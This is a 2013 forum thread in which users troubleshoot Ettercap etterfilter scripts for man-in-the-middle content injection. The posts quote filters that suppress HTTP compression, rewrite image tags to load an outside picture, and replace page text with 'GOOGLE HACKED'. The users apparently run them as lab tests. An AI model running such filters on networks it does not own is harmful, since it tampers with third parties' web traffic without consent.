rdbell Posted May 20, 2013 Share Posted May 20, 2013 Hi, I'm testing out replacing content on a webpage with Ettercap, but having some issues. The example I'm testing with is from irongeek.com: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); } I'm getting it to display "Filter Ran" in the terminal when I load pages, but replacement never actually takes place. Has anyone else encountered this issue? Quote Link to comment Share on other sites More sharing options...
genghis_tron Posted May 21, 2013 Share Posted May 21, 2013 Same problem here, I have not been successful with ettercap on the pineapple. I either get the same message or I instantly get the "not running" message. Quote Link to comment Share on other sites More sharing options...
gigan Posted June 5, 2013 Share Posted June 5, 2013 I was trying to get the irongeek filter working using ettercap on my raspberry pi and had trouble as well. I did quite a bit of searching and I'm pretty sure that the problem is that ettercap is injecting content, but is not changing the content length. I changed my filter so that instead of trying to insert the URL to the jollypwn image, I changed "google" to "hacked" (6 letters for 6 letters). My second filter worked. This is the filter I used: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { msg("in Second IF\n"); if (search(DECODED.data, "Hello")){ replace("Hello", "12345"); msg("run\n"); } if (search(DATA.data, "Google")){ replace("Google", "GOOGLE HACKED"); msg("run2\n"); } } If you search for: ettercap filter content length ..you'll find quite a bit on this topic. If you try the script I've posted, I'd be interested to hear about your results. Quote Link to comment Share on other sites More sharing options...
insomniac Posted July 25, 2013 Share Posted July 25, 2013 This issue is very frustrating.. I've been trying to use ettercap with etterfilter for the last few days and it's not working. For some reason ettercap doesn't replace the incoming packets. I've put tcpdump on my server, and saw the ettercap DID change Accept-Encoding to Accept-Rubbish!, but nothing get replaced on the way back. I've RTFMed the entire internet, could find any help on the subject. Any ideas? btw - I ran the above filter, no incoming packet was changed. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.